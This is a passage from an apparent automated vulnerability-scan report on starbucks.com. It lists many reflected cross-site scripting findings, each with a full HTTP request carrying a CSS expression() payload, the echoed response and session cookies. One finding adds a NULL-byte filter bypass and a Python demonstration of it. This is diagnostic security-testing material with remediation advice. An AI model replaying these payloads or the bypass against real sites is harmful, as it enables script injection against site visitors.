p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:36:59 GMT
Connection: close
Content-Length: 87713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/card?51bc5"style="x:expression(alert(1))"c6d67963f2f=1"/>
...[SNIP]...
3.44. http://www.starbucks.com/customer-service/faqs/coffee [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /customer-service/faqs/coffee
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks (here the content attribute of the page's og:url meta tag). The payload 8de96"style%3d"x%3aexpression(alert(1))"6b0cfc1dd14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8de96"style="x:expression(alert(1))"6b0cfc1dd14 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique relies on CSS expression() and so is specific to Internet Explorer (IE7 and earlier, or later versions rendering in IE7 compatibility mode); it will not work on other browsers, although the underlying defect, reflection of the URL-decoded parameter name into an attribute value without HTML encoding, is browser-independent.
Request
GET /customer-service/faqs/coffee?8de96"style%3d"x%3aexpression(alert(1))"6b0cfc1dd14=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:21:45 GMT
Connection: close
Content-Length: 37419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/coffee?8de96"style="x:expression(alert(1))"6b0cfc1dd14=1"/>
...[SNIP]...
3.45. http://www.starbucks.com/customer-service/faqs/coffeehouse [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /customer-service/faqs/coffeehouse
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks (here the content attribute of the page's og:url meta tag). The payload 19c91"style%3d"x%3aexpression(alert(1))"e534a4ef04b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19c91"style="x:expression(alert(1))"e534a4ef04b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique relies on CSS expression() and so is specific to Internet Explorer (IE7 and earlier, or later versions rendering in IE7 compatibility mode); it will not work on other browsers, although the underlying defect, reflection of the URL-decoded parameter name into an attribute value without HTML encoding, is browser-independent.
Request
GET /customer-service/faqs/coffeehouse?19c91"style%3d"x%3aexpression(alert(1))"e534a4ef04b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:35:19 GMT
Connection: close
Content-Length: 58084

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/coffeehouse?19c91"style="x:expression(alert(1))"e534a4ef04b=1"/>
...[SNIP]...
3.46. http://www.starbucks.com/customer-service/faqs/menu [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /customer-service/faqs/menu
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks (here the content attribute of the page's og:url meta tag). The payload 3f91e"style%3d"x%3aexpression(alert(1))"2090cf84852 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3f91e"style="x:expression(alert(1))"2090cf84852 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique relies on CSS expression() and so is specific to Internet Explorer (IE7 and earlier, or later versions rendering in IE7 compatibility mode); it will not work on other browsers, although the underlying defect, reflection of the URL-decoded parameter name into an attribute value without HTML encoding, is browser-independent.
Request
GET /customer-service/faqs/menu?3f91e"style%3d"x%3aexpression(alert(1))"2090cf84852=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:32:38 GMT
Connection: close
Content-Length: 36961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/menu?3f91e"style="x:expression(alert(1))"2090cf84852=1"/>
...[SNIP]...
3.47. http://www.starbucks.com/customer-service/faqs/responsibility [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /customer-service/faqs/responsibility
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks (here the content attribute of the page's og:url meta tag). The payload dd41a"style%3d"x%3aexpression(alert(1))"0e8674e1677 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dd41a"style="x:expression(alert(1))"0e8674e1677 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique relies on CSS expression() and so is specific to Internet Explorer (IE7 and earlier, or later versions rendering in IE7 compatibility mode); it will not work on other browsers, although the underlying defect, reflection of the URL-decoded parameter name into an attribute value without HTML encoding, is browser-independent.
Request
GET /customer-service/faqs/responsibility?dd41a"style%3d"x%3aexpression(alert(1))"0e8674e1677=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:35:18 GMT
Connection: close
Content-Length: 37184

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/responsibility?dd41a"style="x:expression(alert(1))"0e8674e1677=1"/>
...[SNIP]...
3.48. http://www.starbucks.com/customer-service/faqs/shop [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/customer-service/faqs/shop
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16d45"style%3d"x%3aexpression(alert(1))"16e2af548cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 16d45"style="x:expression(alert(1))"16e2af548cc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.
Request
GET /customer-service/faqs/shop?16d45"style%3d"x%3aexpression(alert(1))"16e2af548cc=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:36:44 GMT Connection: close Content-Length: 51551
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/shop?16d45"style="x:expression(alert(1))"16e2af548cc=1"/> ...[SNIP]...
3.49. http://www.starbucks.com/menu [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12942"style%3d"x%3aexpression(alert(1))"90f8a013063 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 12942"style="x:expression(alert(1))"90f8a013063 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:29:32 GMT Content-Length: 72476
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu?12942"style="x:expression(alert(1))"90f8a013063=1"/> ...[SNIP]...
3.50. http://www.starbucks.com/menu/drinks [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50acb"style%3d"x%3aexpression(alert(1))"842d349c684 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 50acb"style="x:expression(alert(1))"842d349c684 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.
Request
GET /menu/drinks?50acb"style%3d"x%3aexpression(alert(1))"842d349c684=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:18:14 GMT Connection: close Content-Length: 61971
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks?50acb"style="x:expression(alert(1))"842d349c684=1"/> ...[SNIP]...
3.51. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/frappuccino-blended-beverages
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1532"style%3d"x%3aexpression(alert(1))"3f7f1489b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f1532"style="x:expression(alert(1))"3f7f1489b5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.
Request
GET /menu/drinks/frappuccino-blended-beverages?f1532"style%3d"x%3aexpression(alert(1))"3f7f1489b5=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:12:51 GMT Connection: close Content-Length: 50806
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages?f1532"style="x:expression(alert(1))"3f7f1489b5=1"/> ...[SNIP]...
3.52. http://www.starbucks.com/menu/food [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5cc1"style%3d"x%3aexpression(alert(1))"ffcdae7abe1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c5cc1"style="x:expression(alert(1))"ffcdae7abe1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.
Request
GET /menu/food?c5cc1"style%3d"x%3aexpression(alert(1))"ffcdae7abe1=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:18:45 GMT Connection: close Content-Length: 56860
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food?c5cc1"style="x:expression(alert(1))"ffcdae7abe1=1"/> ...[SNIP]...
3.53. http://www.starbucks.com/menu/food/bakery/cranberry-bliss-bar [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/bakery/cranberry-bliss-bar
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78c8e"style%3d"x%3aexpression(alert(1))"9db2eb51a72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 78c8e"style="x:expression(alert(1))"9db2eb51a72 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.
Request
GET /menu/food/bakery/cranberry-bliss-bar?78c8e"style%3d"x%3aexpression(alert(1))"9db2eb51a72=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:04:47 GMT Connection: close Content-Length: 41261
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/cranberry-bliss-bar?78c8e"style="x:expression(alert(1))"9db2eb51a72=1"/> ...[SNIP]...
3.54. http://www.starbucks.com/menu/nutrition [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/nutrition
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bff8"style%3d"x%3aexpression(alert(1))"2562d6e92e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2bff8"style="x:expression(alert(1))"2562d6e92e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.
Request
GET /menu/nutrition?2bff8"style%3d"x%3aexpression(alert(1))"2562d6e92e2=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:19:06 GMT Connection: close Content-Length: 48718
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/nutrition?2bff8"style="x:expression(alert(1))"2562d6e92e2=1"/> ...[SNIP]...
3.55. http://www.starbucks.com/menu/nutrition/20-under-200 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/nutrition/20-under-200
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1e9e"style%3d"x%3aexpression(alert(1))"6d79117ac61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d1e9e"style="x:expression(alert(1))"6d79117ac61 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) written in native code, where strings are terminated by a NULL byte: the filter inspects only the bytes before the NULL, while the application behind it receives the entire value. You should fix the actual vulnerability within the application code (encode the reflected value for its HTML attribute context), and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass. The WAF is a secondary control and must not be relied on as the fix.
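As an added example (not code from the report or from any WAF product), the following shows why a NULL byte gets past a filter that handles request data as a C string while the application behind it still receives the whole value. The "WAF" here is a stand-in with a hypothetical signature list; ctypes.c_char_p is used to read the decoded bytes with genuine strlen() semantics, and the length-aware variant is the kind of correction the remediation text asks the vendor for. The %00 placement in the BYPASS string is constructed for the demonstration.

```python
# Added example (not from the report): a NUL byte truncates what strlen()-based
# native code sees, but not what a managed runtime sees.
import ctypes
from urllib.parse import unquote_to_bytes

# Marker payload from finding 3.55, and a constructed variant with %00 inserted
# after the leading marker, i.e. before the characters a filter would block.
PAYLOAD = 'd1e9e"style%3d"x%3aexpression(alert(1))"6d79117ac61'
BYPASS = 'd1e9e%00"style%3d"x%3aexpression(alert(1))"6d79117ac61'

# Hypothetical WAF signature list (assumption for illustration).
BLOCKED_TOKENS = (b"expression(", b"<script")


def native_view(raw: bytes) -> bytes:
    """What strlen()-driven native code sees: the bytes up to the first NUL.
    ctypes.c_char_p reads its buffer with C string semantics."""
    return ctypes.c_char_p(raw).value


def managed_view(raw: bytes) -> str:
    """What a managed runtime (such as the ASP.NET application in the report)
    sees: every byte, the NUL included, as one string."""
    return raw.decode("latin-1")


def native_waf_blocks(query: str) -> bool:
    """Filter that percent-decodes and then scans the result as a C string."""
    seen = native_view(unquote_to_bytes(query))
    return any(tok in seen for tok in BLOCKED_TOKENS)


def length_aware_waf_blocks(query: str) -> bool:
    """Same signatures, but scanning the full length-delimited buffer."""
    raw = unquote_to_bytes(query)
    return any(tok in raw for tok in BLOCKED_TOKENS)


def app_receives_token(query: str) -> bool:
    """Does the dangerous token reach the application regardless of the NUL?"""
    return "expression(" in managed_view(unquote_to_bytes(query))


if __name__ == "__main__":
    for q in (PAYLOAD, BYPASS):
        print(repr(q))
        print("  native WAF blocks:      ", native_waf_blocks(q))
        print("  length-aware WAF blocks:", length_aware_waf_blocks(q))
        print("  app receives token:     ", app_receives_token(q))
```

The same mismatch applies to any pair of components that disagree on where a string ends; the durable fix is output encoding in the application, with the WAF treated as defence in depth only.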
Request
GET /menu/nutrition/20-under-200?d1e9e"style%3d"x%3aexpression(alert(1))"6d79117ac61=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:21:19 GMT Connection: close Content-Length: 38226
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/nutrition/20-under-200?d1e9e"style="x:expression(alert(1))"6d79117ac61=1"/> ...[SNIP]...
3.56. http://www.starbucks.com/menu/nutrition/20-under-200 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/nutrition/20-under-200
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cccd"style%3d"x%3aexpression(alert(1))"1d36dcad9c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5cccd"style="x:expression(alert(1))"1d36dcad9c6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:29:11 GMT Content-Length: 38226
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/nutrition/20-under-200?5cccd"style="x:expression(alert(1))"1d36dcad9c6=1"/> ...[SNIP]...
3.57. http://www.starbucks.com/menu/nutrition/35-under-350 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/nutrition/35-under-350
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6282"style%3d"x%3aexpression(alert(1))"6302ba5a92f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c6282"style="x:expression(alert(1))"6302ba5a92f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.
Request
